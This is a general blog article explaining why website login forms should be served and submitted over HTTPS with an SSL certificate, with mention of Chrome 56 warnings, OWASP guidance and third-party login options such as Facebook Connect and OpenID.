If you expert in web development and know everything about SSL certificate then you should not read this article. But wait, If you have basic information and don’t know how to secure login form or any critical information on the website than this article is for you. Learn Everything about SSL Certificate.
Web developers that are worth their salt know that when a user logs in into a site that isn’t backed by an SSL certificate, their username and password is liable to be seen in plain text by hackers.
Although the vast majority of businesses employ SSL certificate-backed log in and password fields, they often use it incorrectly. The truth is creating a secure login form is not easy and there are many ways it can be misunderstood. Good and bad ways exist to secure a login form of a website with an SSL certificate.
Multiple risks of an attacker hacking into user accounts exist when an SSL certificate is not used. The hacker would be able to phish the usernames and passwords of multiple users, impersonate those users and inflict a great deal of financial damage by purchasing products, transferring money, hacking into email accounts, etc.
More dangerous still is the fact that several users use the same password on their online accounts as they do with their bank accounts. This means a hacker can break into financial accounts, which raises a storm of problems for your site as the users would blame you for the security breach.
They would have a point as the responsibility lies with you to protect their usernames and passwords, even if your own site isn’t one that needs to be highly secured (e.g.: a forum).
Secure Login Form Mistakes
Magento developers or web developers often fall into making either one of the following two mistakes when creating a secure login form:
- Not securing a login form with SSL
- Not securing the login form at all
The most standard mistake committed by web developers is not securing the login form at all. It is absolutely indispensable that you secure the login page using an SSL certificate, or one of the alternative methods of authentication mentioned below in order to protect the usernames and passwords of your users.
Why You Shouldn’t Place an HTTPS Login Form on an Unsecured HTTP Page
An SSL certificate-backed site that receives a lot of traffic would require more processing power. So an option that a lot of companies pursued was placing the login form on an HTTP page (for example, the homepage) and have the form be submitted to an https page. The theory was this would protect the login information and encrypt it when it is submitted, however, we advise against doing this for the following three reasons.
One, the user will not be able to know that the login information will be encrypted — unless he or she studies the site’s source code.
It has become customary for web users to look for the “golden lock” graphic icon, or even the “green bar,” to reassure them that the web session is encrypted as they establish their login details with the website. These visual signals inform them that they are protected against phishing attacks. Removing them, despite the information being encrypted, would make the form seem insecure.
Two, the form’s action can be easily changed to another URL by a hacker. Because the login information is sent over HTTP, an interloper could easily insert a different URL for the form to post to. The user would have no idea the username and password had been sent to the hacker.
A third reason is that the method of hosting a login form on an HTTP URL will be subject to security warnings in Google Chrome starting in January 2017. The search engine is obliging business owners to switch to hosting the login form on an https URL in order to avoid the triggering of warnings in Chrome 56 for all domains.
The move is unsurprising considering the Internet company has granted a ranking boost to pages with https URLs and has openly spoken in favor of hosting the login page on an https URL for a while now.
Secure HTTPS Login on PayPal
When it comes to PayPal, there are two options for creating a means to securely enter login information:
- Create a separate login page that is only accessible via https and submitted via https.
- Permanently enforce https on the homepage, which features the login form. In this case, the user is more likely to bookmark the https homepage rather than a separate login page.
The OWASP SSL Best Practices state it clearly: an SSL certificate should back the login landing page. At the same time, the page wherein the web user submits his or her login information should be an https page.
Alternative Options for Establishing Secure Login Form
What if you’re looking not to enforce https on the login page or purchase an SSL certificate? There are now several options available that allow you authenticate users using alternate means:
By using Facebook Connect, you are allowing Facebook to handle the authentication of your users. The user logs in using the Facebook site, which is secured with SSL, and is convenient for him or her too, as the user just has to remember his/her username and password for Facebook in order to access your site.
A lot like Facebook Connect, OpenID permits users to authenticate on a third-party site. Though not as popular as Facebook, there are several OpenID services available on the market now.
Twitter also makes it easy to have your users log in securely to your site through their Twitter accounts.
Using an SSL certificate to secure your login form is just one aspect of the entire process of securing your site. However, when you don’t do it, you are opening to your site to the very real possibility of hacker and phishing attacks. By using the form properly, you invite your users to trust you and your brand name when they submit their sensitive information.
Denise Recalde is a Senior Content Writer at Day Translations, a human translation services company. A seasoned writer and editor with eleven years of experience under her belt, she is a bonafide wordsmith who loves playing with the written word creatively and always takes care to lend a certain hue of snap and color to her drafts.